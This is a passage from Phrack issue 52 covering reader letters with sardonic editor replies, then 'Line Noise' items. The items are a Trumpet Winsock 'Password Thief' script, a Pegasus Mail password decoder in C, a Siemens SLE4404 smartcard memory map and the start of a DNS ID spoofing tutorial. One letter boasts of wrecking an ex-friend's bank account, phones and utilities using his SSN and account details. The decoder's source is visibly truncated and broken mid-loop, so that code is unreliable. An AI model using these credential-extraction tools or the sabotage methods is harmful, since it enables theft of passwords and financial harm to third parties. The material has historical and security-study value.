hacked version of TCP/IP an/or a hacked version of Open Transport. thanks. [ You're neat. Let's be pen-pals. ] 0x20>------------------------------------------------------------------------- Hello! Sorry for borring you, but I've some problems with L2 on FreeBSD-2.2.1R and decide to ask you about some tech details. The problem is that 'loki' unable to receive ICMP_ECHO packets from 'lokid'. I dig through kernel netinet sources and AFAIK, there is no way to pass ICMP_ECHO packets to userland. In ip_icmp.c we have: ICMP_ECHO->icmp_input()->icmp_reflect()->ICMP_ECHO_REPLY->icmp_send()->net So, there is no chance to receive ICMP_ECHO in application program, isn't it?! Unfortunately, I've no access to Linux box, so I can see what's hapen there. [ You are correct. In the accopmanying paper I allude to this problem. Net/3 based stacks will not pass ICMP request packets to userland. ] Is there are any workarounds? I can patch my kernel, but I think this is not right way. What do you think about this? [ Running the client and daemon on Net/3 boxes is a problem. ] p.s. The idea of patch is simple - create copy of packet's mbuf via m_copy(), send it to rip_output() and only after that pass original packet to icmp_reflect(). [ Cool! Write the patch up and I'll publish it in a future issue. ] Regards, Roman. 0x21>------------------------------------------------------------------------- I would like to put a request out for all so called "hackers" to join up i can't find nobody to talk to in this Hellhole Richmond,Virginia I want to put a message up for all VA area code 804 hackers that live near richmond to email me at DrMischief@juno.com . ThanX ThanX, Mischief ALIAS: DrMischief [ Here's your chance. ] 0x22>------------------------------------------------------------------------- Let me start by saying your magazine is great. I read it whenever I have time. I am a newbie and want to know if you know anyone who could help me get started who lives/operates in the Morris County, NJ area. ~The Gator P.S. If you know anyone using the handle 'The Gator', can you please tell me so I don't offend anyone. [ You mean you haven't checked in the official codename repository? Oh boy. I don't envy you. `The Gator` is one of the most sought after nicks in the history of nicks! You're in for it now. God help you. ] 0x23>------------------------------------------------------------------------- Hello! Thanks for such a good e-zine. It has a lot of relevant articles, and it helped me start hacking. Again. thanks for that. I was wondering one thing, however: do you know onything about the Mentor? He wrote the Hacker MAnifesto, and I believe he wrote an article for phrack once...... Could you give me any help, please? I'm dong this for a school project.... [ I hear the mentor joined a new wave band and changed his name to Bobbysox. ] 0x24>------------------------------------------------------------------------- Where can I find a sshd.c trojan? [ http://www.cs.hut.fi/ssh/#current-version ] 0x25>------------------------------------------------------------------------- I'd like to know if someone of you ever made some compiling in C (I'd like something for you) thank's [ Huh? ] 0x26>------------------------------------------------------------------------- Hi, I need a FALSE IP APP: Can You Help ME? [ NO I can't HELP you AT all. ] 0x27>------------------------------------------------------------------------- I heard about Phrack magaine issue talks about hijacking sessions, which one is that issues? I can't find it. [ P50-06 ] 0x28>------------------------------------------------------------------------- I'm trying to reach all the real hackers and phreaks (not stupid warez lamers) in the 601 area code, especially those around Lauderdale county, so I figured Phrack would be a good place to start. A few friends and I are gonna be starting some get-togethers at the new Bonita Lakes Mall in Meridian when it opens up later this October (probably long past by the time the issue of Phrack this will be in comes out). All fellow readers interested in reviving the HP scene in the East Mississippi-West Alabama area are welcome to come (reviving assumes that there was ever a scene here in the first place. We're quite boring hicks in this part of the country). If you're planning on coming, or want more info, please E-Mail me at weaselsoftware@hotmail.com Even if we just have the locals, we should have a lot of fun, so if all goes well, I just might be writing an article for Phrack about it, if ya'll would be interested. [ We would'nt be. Ya'll. ] Cheers, -|/|/easel 0x29>------------------------------------------------------------------------- I'v have a few questions about Juggernaut: 1) can it capture ethernet packet ? [ It can capture many. ] 2) can it act like sniffer ? [ Shure. ] 3) which compiler [ GNU C compiler ] 4) does it have to run on root [ No, it has to run as root. ] 5) which plateform does it work on? [ Linux (legacy version) Linux, BSD, Solaris (current unreleased version) ] 0x2a>------------------------------------------------------------------------- You could say I'm a newbie or novice. I would be very greatful if you could send info on anything on beginning hacking. Like what computers are the best and what additional accessories you need. So in short please send any info you could. Thanks. [ WHAT AM I DOING? I AM PUBLISHING PHRACK. WHAT IS PHRACK ABOUT? PHRACK IS ABOUT DISSEMINATING ENTROPIC INFORMATION TO ANYONE WHO WANTS IT. ARE YOU CONFUSED? IT WOULD APPEAR SO. ] 0x2b>------------------------------------------------------------------------- I have heard about your magazine. I am not new but I am not experienced to this side. Would you please guide me to where I would begin. pool [ P51-02@0x2a ] 0x2c>------------------------------------------------------------------------- Kong-ratz Guyz! You made it onto C|NET Last night at 10 on (Sept) the 5th. They were bashing you! Damn..... Well thats it. C-ya! [ Hrm. ] 0x2d>------------------------------------------------------------------------- After reading Phrack for years and being in the computer industry for 18+ years, I thought it was time that I write in. I have been reading Phrack for about 6 years now. Even talked to Erik Bloodaxe a few times in regards to Banyan Vines a couple of years ago when I was in the military. The scene seems to have changed so much now. It used to be full disclosure for the most part. Now everyone is so paranoid of sharing what they know, since everyone will rush a patch out for the latest exploit. How do you think others learned? Hacking is and always will be about exploring the limits of systems and networks. As you learn and share, others can expand their knowledge base. I started back on Atari 400s years ago coding in BASIC. I know many will laugh at that very thought, but it was a start. The groups back then were very tight, but also willing to help each other. If you showed a willingness to learn, and took the time to learn, instead of just leeching, it was amazing what others would do to help you. I have been digging through tons of sites lately, most are outdated hacks from what I have seen. Most places patch as fast something hits the `Net. But at least you can learn from the code if you take the time. I want to sends congrats out to Phrack. You guys along with a handful of others make it a point to keep sending things out to us in the community. One of the comments I am sure to hear is, then why don't you contribute things? I have not to Phrack directly, but that will change soon. I don't have a lot that is that great, that hasn't been patched for already. Mine is more tinkering and learning. Anyway, I am sure I have rambled enough for now. Just thought I would give my $.02 worth. Keep up the good work at Phrack! L8R, D-Man 0x2e>------------------------------------------------------------------------- I am looking for a REALLY good telenet software and an also REALLY good [ I like the telnet software that comes with 4.4BSD. ] scanner software. Can you refer me anywhere? [ Scanners was a terrifiing movie! Why would you want to scan someone?!@ ] I also would like to know how you decode the password in the passwd file. For example it writes: john: x :9999 :13: John Johnson:/home/dir/john:/bin/john [ 'x' is a shadow password token. It cannot be decrypted. Futhermore: Unix passwd encryption is based on a modified version of DES. The user enters her login and password at the prompts. The user entered password is used as a key to encrypt a 64-bit block of NULLs. The first seven bits of each character are extracted to form a 56-bit key. (The other eight are used for parity.) This implies that only eight characters are significant to a password. The E-table is then modified using the salt, which is a 12-bit value, coerced into the first two chars of the stored passwd. The salt's purpose is to make precompiled passwd lists and DES hardware chips ineffectual (or more difficult to use). Then, DES is invoked for 25 iterations on the block of zeros. The output is 64-bits long, and is then coerced into a 64 character alphabet (0-9, A-Z, a-z, ".", "/"). This involves translations in which several different values are represented by the same character. Unix passwd crypts are the product of a one-way hash. Information about the key is dropped in every iteration. Bits are LOST in the process. crypt(3), therefore, CANNOT be decrypted, reversed, or otherwise subverted from any type of scrutiny of it's output. ] 0x2f>------------------------------------------------------------------------- To the Editor: I have to give out props to the job done on Phrack51.....it just keeps getting better and better. Iv'e enjoyed Phrack 1-50 but i must say that since the current staff of the mag took over iv'e really noticed a marked improvement in the qaulity and content of the articles. Thanx for making this magazine available to all of us out here who are reading and learning But just one thing wheres my pics of Mila Jovavich in the nude!!!!!! NMEwithin [ http://www.infonexus.com/~daemon9/PIX/milla4.jpg ] 0x30>------------------------------------------------------------------------- a story of adolencent revenge..by a not so adolencent at 3:37 am [ Be warned. This is long. ] So here i sit surrounded by an ashtray full of butts, empty beer cans, empty 2 liters, a giant pile of papers, a stack of cd's, dirty dishes, tangled cords, red and green lights, the ticking of the furnace and blurred vision. Just got back from the pool hall and pissed off. why? because an old friend is getting married tomorrow and I was not invited. Well WAS a friend is more to the point. Betrayal in any form is a great primer for hatred. I am a twenty something (hate that fucking phrase) loser with no clue on what the future holds..but I find pleasure in figurative masterbation with MY processor. Match wits with this bitch, tell IT what to do and make it my slave...cheap thrill. Having power over something or someone is great while it lasts..as long as you do not have a concience. But I was wronged, so it is justified..my actions I mean... right? My girlfriend is asleep upstairs and thinks I sit up a nights doddeling to porn sights. I tell her that my pc is not working right, so that is why I am always working on it...that fucker bill gates. If he was a smart as the world beleives he is, these activities would not be so easy. Back to the point. (sorry! had a few too many). So I sign on...search for allies, find them among other assholes that have somehow learned one of my handles. My buddies are up to some funny shit, not total anarchy, but funny none the less. So what do I do...I tell them that I am in a bad state of being at the moment..they ask why, "Time for pain!" is what I read. You know how it is. A friend since first grade on through college just fucked you for the 100th time. I feel sick about it, but none the less it's time to put to work the tricks of the trade. I give my TRUE friends the skinny on my intentions, they ablige with laughter and frothing mouths. I cough up his SS#, home, phone, bank, work, license, and online accounts. Too late to turn back now. It's funny how one will actually take the gas pipe for virtual strangers that one has formed an online bond with, and will enlist them in a sceme to fuck a real time friend. (ex-friend). Number one, divide up the tasks. Number two, failure is NOT an option. N!umber three, ruin wedding. So here we go...secretary of state was a blow off, no brainer. PhoneCo a bit tougher (but been there before). Bank..oh the bank.. online banking 24/7 was such a good idea. My collective cohorts and I were like pitbulls fighting over the neighbors cat. Giggeling like schoolgirls. HEY we are elite! or so we think..most of our shit (not all) was built by others before us. We did modify code, but the backbone was not our own. Now it is 4:30 am and the shit is flying...after reading the "underground" being a martyr seems cool. My head is spinning, but I have to remain focused at all times..it is hard. Account activity...money is due to the banquet facility tomorrow. At least the balance of the shindig after the initial deposit. Check numbers and cleared transactions. He has no fucking clue! The best part was that he had mentioned writing a check for his balance only one day before.... but the amount owed was not cleared yet on his account. So time to insert! --0.00 balance. Too easy. OK, fine. Just a bounced check to deal with. Phones turned off (schedualed termination for lack of response to notices sent). Oh yeah..did I mention Utilities? Bank takes care of payment...how convenient. Car payments, insurance, mortgage the whole nine. Zip, Zero, Zed. A repeater. Constant (0.00). I am an asshole, I know, but being fucked by a 'FRIEND" is troubeling and unforgivable in this situation. One more thing..Company Voice mail...fucked. Left a text to speech recording to boss, too funny and implicating to dillhole. It's like giving beavis and butthead a small piece of gray matter that works for only bad things. I should of been invited to this wedding, but never the less, he is marrying a whore. This may sound vindictive or like sour grapes, but totally true. So actaully we are doing him a service, he just does not know it. The "ruin the wedding" part is actually out. It will happen and the avalanche of our actions will not start until the following week. But at least i did something, right? What a stupid thing to concentrate on. I am an idiot with things I should not have. Most of my collective friends are striking political targets...I am bouncing a check. But I am over it now. Time to sit back and wait...wait for the phone call from a mutual friend to give me the dirt. I guess I am the type of guy that would get a boner if I reset his sprinkler timer to go off when he is trying to get in his car. Totally retarded, but I would laugh for days. Whats wrong with me? I am now sitting here in my self-made dungeon scratching my head saying to myself "boy that was way harsh". I know some people would pose the question, "what did he do to desrve this type of retaliation?". You know what it's like, you have been there at one time, and everyone reaches a point where counter measures are warranted. Case closed. What we did was but an inconvenience, but will be remedied. Nothing was left beyond repair. It's at these times! (no matter how trivial) you find out who is willing to take a bullet for you. And in some fucked up way, that is important. At least it is to me. it's 7:49 am and time for the sandman. SychoSiS - The Collective. [ I am not sure which saddens me more, the fact that you actually spent several hours writing this, or the fact that I spent several minutes reading it. Now Phrack's loyal readers can feel my pain and read this for themselves. ] 0x31>------------------------------------------------------------------------- To whom it may concern: I believe that I submitted an article to your publication on hacking the phones at your local WAL~MART, please be advised that I submitted the same article to 2600 magazine and blacklisted 411, however I submitted the article to 2600 magazine before yours or blacklisted, they have decided to publish my article, and there fore I wish to inform you of this so there is no confusion. Thank you for your attention, Pirho -- Brought to you by Pirho and the International Brother Hood Of Frat Houses. [ We can only hope that your article brings Emmanuel and the rest of the 2600 editorial team as much amusement as it brought us. Not from going and harassing people at Walmart, no. Mostly from laughing at you for writing it. We'll leave the articles on hacking things like Walmart and Disney World for publication by 2600. We like to think we still have a reputation for quality. -alhambra ] 0x32>------------------------------------------------------------------------- Dear..sir I had readed yours doc.I'm interesting about hacking art and learing it.I would like to ask you.How can I hack my ISP?It's dumbing I know.But I don't know to ask anybody. [ I wonder if the aleph1speak to English translator has a `Yoda setting`... ] 0x33>------------------------------------------------------------------------- Hey, I just finished a two hour picture tour at your webpage, looked at every single photo on that hosted there, I know for one thing, with all the film you have used, Kodak must love you! The pic's were a riot, matter of fact, I almost had an accident in my pants I was laughing so hard. Seam's [ Maybe you should get some rubber pants or those adult diapers. ] like you and your friends know how to have fun (my kind of people) all we have up here is half-wit clowns. Anyway, enuf with the bullsh*t, I just wanted to ask you who owns "INN", if it is you, how did you pay for all that hardware? Where are you located, Cali I assume? How old are you? Any chance of meeting somewhere to chat one day (IRC)? If it's to personal, I understand, if not, reply.. [ Are you coming on to me? ] Regards -Tyrant 0x34>------------------------------------------------------------------------- [ ...Regarding the 'Teardrop' IP fragmentation bug... ] Dear To whom it concearns, I do not think you should have posted this about your bug you found. Alot of maniacs got a hold of it and are crashing servers everywhere. The net has turned into anarchy. I have about 4 servers down that i patched. But [ The Internet is anarchistic by nature. ] the patch doesnt seem to work. [ The patch works fine. Perhaps it is you that is broken? ] I do not think you should have posted that publically like that. [ Thanks. I'll make sure to file your opinion in the ignorance-folder. ] 0x35>------------------------------------------------------------------------- I'm just wondering when is defcon and where can I find out about little bit more? Regards. Pav. [ Defcon is traditionally held during the Summer in Sin City. Damn I love that town. http://www.defcon.org for more info, although the future of this Con is in question. ] 0x36>------------------------------------------------------------------------- Where can I find ways to make Long Distance phone calls without getting billed (and prefferably without making any boxes?) [ A phone line for which you do not pay the bill. ] I'm not an idiot, I just thought I'd ask. :) [ Is that open to conjecture? ] 0x37>------------------------------------------------------------------------- To Whom It May Concern: I enjoy reading your stuff in Phrack and I pay attention to those stuff that is writen about unix reading stuff. I am just wonder if there is any way to play tricks or hack linux 1.2.13. It also runs pine under it and I think there is a trick with .rhosts in pine and ls /tmp. Could you please tell me more stuff about this?? I could download the /etc/passwd file but then I have to use a dictionary to hack it and is there away of hacking it without using a dictionary?? And how do I delete my last login file?? Thanks!! Your Truly Tag [ Linux 1.2.13 is one of most inpenetrable versions of Unix out there today. Not only is the Linux O/S reknown for its stalwart and inpenetrable security but the 1.2.13 kernel was where Alan, Eric, Linus and the rest of crew peaked. That kernel revision is all-but immune to every known form of attack (with the possible exeception of quantum state disassembly). Your best bet is to kill yourself now. ] 0x38>------------------------------------------------------------------------- How ye all doin there at Phrack, hope your all keepin well. Anyways before I say anything I'll admit it, I'm a newbie, not a lamer a newbie. I've read all the hacking files I can get my hands on. There's only one small problem...I live in Ireland. A few weeks ago I was given an article written by "Hackwind" (1992 I think) about the hacking scene in Ireland. Believe you me. It's even worse than he says it is. The main problem is that all the files written don't relate to Ireland in any way . I don't even know ONE bbs in Ireland and NO ONE I have spoken to does either. I don't expect you to know much about the hacking scene in Ireland but if you do know anything, anything at all could you please send it to me. I'm dying for information. Information that I can't get my hands on. If you don't know anything about it perhaps you know of some contacts. Please let me know. Cheers, N0_eCH0 PS. Keep up the good work at Phrack. [ Ok, someone in Ireland help this guy out. ] 0x39>------------------------------------------------------------------------- hello my name is FUSION from a group called digital elite alliance and i was wondering if you would like to become allies with us. If so e-mail me back at XXXX@prodigy.net and then i'll get back to you. [ Don't hold your breath. Wait. On second thought, do. ] 0x3a>------------------------------------------------------------------------- Daemon9, Hi! I'd like to ask you a very common question. Maybe everyday you have received mails asking it. Yes, what I want to know is how to become a great hacker. [ Swing from the shoulders, not from the arms. ] I am a freshman in university. I wanna to be a hacker, not for doing damage to others, but in my own view, being hacker require a lot of knowledge and creative. I aim at knowledge and want to find out new tech, while not just using others'. In fact, I have read many articles about how to become a hacker. And I have done them. Now, I have mastered C, unix shell, and some of TCP/IP. So what should I going to learn if I want to be a great hacker like you? [ If you have mastered the aforementioned topics, you are far greater then I. ] I am learing socket programming and IP-spoofing now, do you have any resource on the net to recommend to me? Please write me back. Hoping to hear from you soon. Liu Jiangyi -- Daemon9, Hi, I forgot to ask you another question. Should I join a hacker group? And have you joined it? If so, please tell me which group I should join. And the mailing list, which one should a hacker join in your own view. Hoping to hear from you soon! Liu Jiangyi 0x3b>------------------------------------------------------------------------- [ A few letters to nirva and I. I swear to GOD these aren't made up. I *couldn't* make stuff like this up. ] Hey Route, I was wondering if you knew what colours Nirva dyed his hair for defcon and who made the dye, I was also wondering if you had a copy of LISP lying around somewhere. Are you going to the KMFDM concert this friday by any chance? I was wondering if you have ever been bust for hacking or phreaking and how you manage to hack with the constant surveillance by the man? Also if you don't mind telling me, how did you get into hacking and did you have a mentor at any stage? Ciao and thankx -- Hey Nirva, I was wondering how you got Real Kitty to drink coke out of those bottles from McDonalds (or is he just chewing on the straw). I was also wondering who Mike is currently going out with, not to mention you as well? If you could do me a favour and try to convince Mike to give me some webspace as well, I would really appreciate it. Thankx and Ciao -- Hey Mike, How would you like to win a date win with carmen electra, if you would like to, go on over to durex.com and there's a link from there to the american site with the entry form to win the date, and being such a brilliant hacker I don't see how you couldn't manage to rig the contest ;) Thankx and Ciao 0x3c>------------------------------------------------------------------------- Arggh , think of me what you will, but i Can't get over a pic on yer site of nirva, prolly one of the l33t3st looking individuals i've seen, in personal appearance (no, i aint gay), but anyway .. what are those things on his arms ? I saw that photo with the caption "nirva has rickets" or something, but are they implants ? ie part of his image/appearance or where they sum sort of weird disease he picked up ? [ Due to the vitaman-D embargo of 1975 - 1978 in New Mexico, nirva contracted the rare disease osteomalacia (rickets). He has it mostly licked these days thanks to heavy amounts of vitamn-D laced EMF radition treatment he undergoes 2 times a week. Every now and then, however, he lapses, as you can see from the aforementioned picture. ] tah man .. great page btw speaxx 0x3d>------------------------------------------------------------------------- ----[ EOF ---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20 -------------------------[ P H R A C K 5 2 L I N E N O I S E --------[ Various 0x1>------------------------------------------------------------------------- Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you. <++> password.cmd # Put in Trumpet Winsock directory, run under "Dialer/Other" # Cannot currently use any file other than trumpwsk.ini, # apparently due to implementation errors in the "load" function display \n display "Trumpet Password Thief 1.0, 8-18-95"\n display \n if [load $username] display "username: " display $username\n else display "ERR: cannot load username"\n end if [load $password] display "password: " display $password\n else display "ERR: cannot load password"\n end display \n <--> - anonymous 0x2>------------------------------------------------------------------------- Another password decoder for ya... written long ago, I just never bothered to release it... <++> peg-dec.c /* * Pegasus Mail Password Decoder v1.0 by Belgorath */ #include /* Decoding/Encoding Tables */ int dec1[1]= { 44 }; int dec2[2]= { 16, 21 }; int dec3[3]= { 10, 22, 28 }; int dec4[4]= { 37, 28, 21, 7 }; int dec5[5]= { 21, 22, 37, 28, 9 }; int dec6[6]= { 22, 15, 28, 42, 17, 2 }; int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 }; int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 }; int decode_char(int numch, int ch, int pos) { ch-=decz[numch-1][pos-1]; if(ch<-127) ch+=256; return ch; } void main(void) { int zz,x,nc; char *tz; int inps[20]; nc=0; tz=malloc(8192); printf("Enter Pegasus Mail Password: "); gets(tz); /* Fun input parsing loop. Hope your malloc bzero's... */ while( *tz ) { for(x=0;x 0x3>------------------------------------------------------------------------- :----------------------------: Siemens Chip Card Technology . by Yggdrasil . :----------------------------: Chip cards differ from one another in memory size, type of memory (PROM or EEPROM), security logic and micro-controller. This article will discuss the Siemens SLE4404 chip card technology. The SLE4404 is employed for electronic purse cards and bank transactions, cellular telephony (pre-payed cards), user IDs for access control, etc. (some examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed through a simple TTL serial channel, providing a +5 Vcc power supply from an external source. Inside the chip ~~~~~~~~~~~~~~~ The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix (each row is 16-bits) that is protected by security logic providing access control. This is the logic diagram: +------------------------+ +------------------+ | Address Counter | --> | Column Decoder | +------------------------+ +------------------+ ^ | | 16 | v v +-----------+ +---------+ +------------------+ C3,C8,C2,C5 --> | Control & | | Row | | User mem 208 bit | C1 (Vcc) --> | Security | | Decoder | --> | Sec unit 192 bit | C7 (I/O) <--> | Logic | | | 26 | Special mem unit | +-----------+ +---------+ +------------------+ ^ ^ | | +----------------------------------+ The SLE4404 memory is subdivided in three main memory blocks: one is read only (a "PROM" containing the manufacturer code and/or a serial number and an expiration date), the second is both readable and writeable (user memory) and the last block cannot be written to unless the lock-out fuse has been fused. This is the memory map: BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE ----------------------------------------------------------------------------- Manufacturer code 16 0-15 Yes No No Application ROM 48 16-63 Yes No No User code 16 64-79 [fuse] U.C. U.C. Error counter 4 80-83 Yes Yes U.C. EEPROM #1 12 84-95 Yes Yes U.C. EEPROM #2 16 96-111 Yes U.C. U.C. Frame memory block - F.M. config 2 112-113 Yes Yes U.C./R.C. - Frame memory 206 114-319 [cfg] [cfg] U.C./R.C. Frame code 32 320-351 [fuse] [fuse] [cfg] Frame counter 64 352-415 Yes Yes [cfg] ----------------------------------------------------------------------------- Meaning of abbreviations: U.C. - User code required (each time the code is entered the error counter is decreased) R.C. - Frame code required (each time the code is entered the frame counter is decreased) [fuse] - Operation allowed ONLY IF lock-out fuse is not fused [cfg] - Operation allowed according to frame memory configuration Frame memory configuration table: BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE ----------------------------------------------------------------------------- 0 0 Secret ROM Yes No 0 1 R.O.M. Yes No 1 0 Secret PROM U.C. U.C. 1 1 P.R.O.M. U.C. U.C. ----------------------------------------------------------------------------- The first 16-bit block is for the Manufacturer Code. The following 48-bit block is called Application ROM, containing another code (Manufacturer sub code or info, serial number, sub-type of card, etc). The User Code is the access code (PIN) used to read/write/erase memory. This code can be modified provided that the fuse was not fused, while the error counter value can be modified even if the fuse was fused... Please note that access to memory is blocked after four incorrect access trials (checked by the counter). The same is for the Frame Code and the Frame [error] Counter (note that the number of incorrect accesses is limited to three trials instead of four). Finally, the Frame Memory is generally used for storing personal user information or the credit limit (money that can be fetched in a bank transaction, or the remaining "virtual" credit that a pre-payed cellular card contains). The Pin-out ~~~~~~~~~~~ This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): +-------+-------------------+ | C 1 | C 5 | Contact Pin Info | | | +-------+ +-------+ 1 6 Vcc +5V | C 2 | | C 6 | 2 5 Reset | | | | 3 4 Clock +-------+ +-------+ 4 3 Test input - N.C. | C 3 | | C 7 | 5 8 Ground | | | | 6 7 N.C. +-------+ +-------+ 7 1 Bi-directional I/O data line | C 4 | | C 8 | 8 2 Control input (data change) | | | | +-------+-----------+-------+ "I am for ever walking upon these shores, betwixt the sand and the foam. The high tide will erase my foot-prints, and the wind will blow away the foam. But the sea and the shore will remain For ever." -- Gibran K. Gibran 0x4>------------------------------------------------------------------------- ___ ______ _ _ / \ | _ \ | \ / | | / \ | | | \ | | \_/ | | |___| | | |_ / | | \_/ | ..oO THE | --- | | / | | | | CreW Oo.. ''' ''' ''''''' '''' '''' presents DNS ID Hacking --[1]-- DNS ID Hacking Presentation You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID hack/spoof is very efficient and very strong as there is no generation of DNS daemons that escapes from it (even WinNT!). --[1.1]-- DNS Protocol mechanism explanation In the first step, you must know how the DNS works. I will only explain the most important facts of this protocol. In order to do that, we will follow the way of a DNS request packet from A to Z! Name resolution example: The client (bla.bibi.com) sends a request of resolution of the domain "www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for DNS. Let's take a look at the following picture.. /---------------------------------\ | 111.1.2.123 = bla.bibi.com | | 111.1.2.222 = dns.bibi.com | | format: | | IP_ADDR:PORT->IP_ADDR:PORT | | ex: | | 111.1.2.123:2999->111.1.2.222:53| \---------------------------------/ ... gethosbyname("www.heike.com"); ... [bla.bibi.com] [dns.bibi.com] 111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53 Here we see our resolution name request from source port 1999 which is asking to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has received the resolution request from bla.bibi.com, dns.bibi.com will have to resolve the name: [dns.bibi.com] [ns.internic.net] 111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53 dns.bibi.com asks ns.internic.net who the root name server for the address of www.heike.com is, and if it doesn't have it and sends the request to a name server which has authority on '.com' domains (note: we send a request to the Internic because it could have this request in its cache). [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53 Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS that has authority over the domain bibi.com), that the name server of for.com has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will ask to ns.for.com for the address of www.heike.com, but this one doesn't have it and will forward the request to the DNS of heike.com which has authority for heike.com. [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53 The answer from ns.for.com: [ns.for.com] [ns.bibi.com] 144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53 Now that we know which IP address has authority on the domain "heike.com" (we'll call it ns.heike.com), we ask it what's the IP of the machine www.heike.com. [ns.bibi.com] [ns.heike.com] 111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53 We now have our answer: [ns.heike.com] [ns.bibi.com] 31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 Great we have the answer, we can forward it to our client bla.bibi.com. [ns.bibi.com] [bla.bibi.com] 111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999 Now bla.bibi.com knows the IP of www.heike.com. Now let's imagine that we'd like to have the name of a machine from its IP, in order to do that, we proceed a bit differently as the IP will have to be transformed. Reverse name lookup resolution: 100.20.40.3 will become 3.40.20.100.in-addr.arpa This method is only for the IP resolution request (reverse DNS). Let's look at a practical example of when we take the IP address of www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation into a comprehensible format by DNS). ... gethostbyaddr("31.33.7.44"); ... We send our request to ns.bibi.com: [bla.bibi.com] [ns.bibi.com] 111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53 Which is forwarded to ns.internic.net: [ns.bibi.com] [ns.internic.net] 111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 ns.internic.net will send the IP of a name server which has authority on '31.in-addr.arpa'. [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53 And so on. The mechanism is nearly the same that was used for name resolution. --[1.2]-- DNS packet header Here is the format of a DNS message : +---------------------------+---------------------------+ | ID (the famous :) | flags | +---------------------------+---------------------------+ | numbers of questions | numbers of answer | +---------------------------+---------------------------+ | number of RR authority |number of supplementary RR | +---------------------------+---------------------------+ | | \ \ \ QUESTION \ | | +-------------------------------------------------------+ | | \ \ \ ANSWER \ | | +-------------------------------------------------------+ | | \ \ \ Stuff etc.. No matter \ | | +-------------------------------------------------------+ --[1.3]-- Structure of DNS packets. __ID__ The ID permits us to identify each DNS packet, since exchanges between name servers are from port 53 to port 53, and more it might be more than one request at a time, so the ID is the only way to recognize the different DNS requests. Well talk about it later.. __flags__ The flags area is divided into several parts : 4 bits 3 bits (always 0) | | | | [QR | opcode | AA| TC| RD| RA | zero | rcode ] | | |__|__|__| |______ 4 bits | |_ 1 bit | 1 bit QR = If the QR bit = 0, it means that the packet is a question, otherwise it's an answer. opcode = If the value is 0 for a normal request, 1 for a reserve request, and 2 for a status request (we don't need to know all these modes). AA = If it's equal to 1, it says that the name server has an authoritative answer. TC = No matter RD = If this flag is to 1, it means "Recursion Request", for example when bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the DNS to assume this request. RA = If it's set to 1, it means that recursion is available. This bit is set to 1 in the answer of the name server if it supports recursion. Zero = Here are three zeroes... rcode = It contains the return error messages for DNS requests if 0, it means "no error", 3 means "name error" The 2 following flags don't have any importance for us. DNS QUESTION: Here is the format of a DNS question : +-----------------------------------------------------------------------+ | name of the question | +-----------------------------------------------------------------------+ | type of question | type of query | +--------------------------------+--------------------------------------+ The structure of the question is like this. example: www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] for an IP address, the format remains the same. 44.33.88.123.in-addr.arpa would be: [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] [note]: a compression format exists, but we won't cover it. type of question: Here are the values that we will use much of the time (there are many more, but these are only ones relevant): name value A | 1 | IP Address (resolving a name to an IP) PTR | 12 | Pointer (resolving an IP to a name) type of query: The values are the same as the type of question. DNS ANSWER: Here is the format of an answer (an RR) +------------------------------------------------------------------------+ | name of the domain | +------------------------------------------------------------------------+ | type | class | +----------------------------------+-------------------------------------+ | TTL (time to live) | +------------------------------------------------------------------------+ | resource data length | | |----------------------------+ | | resource data | +------------------------------------------------------------------------- name of the domain: The name of the domain in reports to the following resource: The domain name is stored in the same way that the part question for the resolution request of www.heike.com, the flag "name of the domain" will contain [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. type: The type flag is the same than "type of query" in the question part of the packet. class: The class flag is equal to 1 for Internet data. time to live: This flag explains in seconds the time-life of the information into the name server cache. resource data length: The length of resource data, for example if resource data length is 4, it means that the data in resources data are 4 bytes long. resource data: here we put the IP for example (at least in our case) I will offer you a little example that explains this better: Here is what's happening when ns.bibi.com asks ns.heike.com for www.heike.com's address ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) 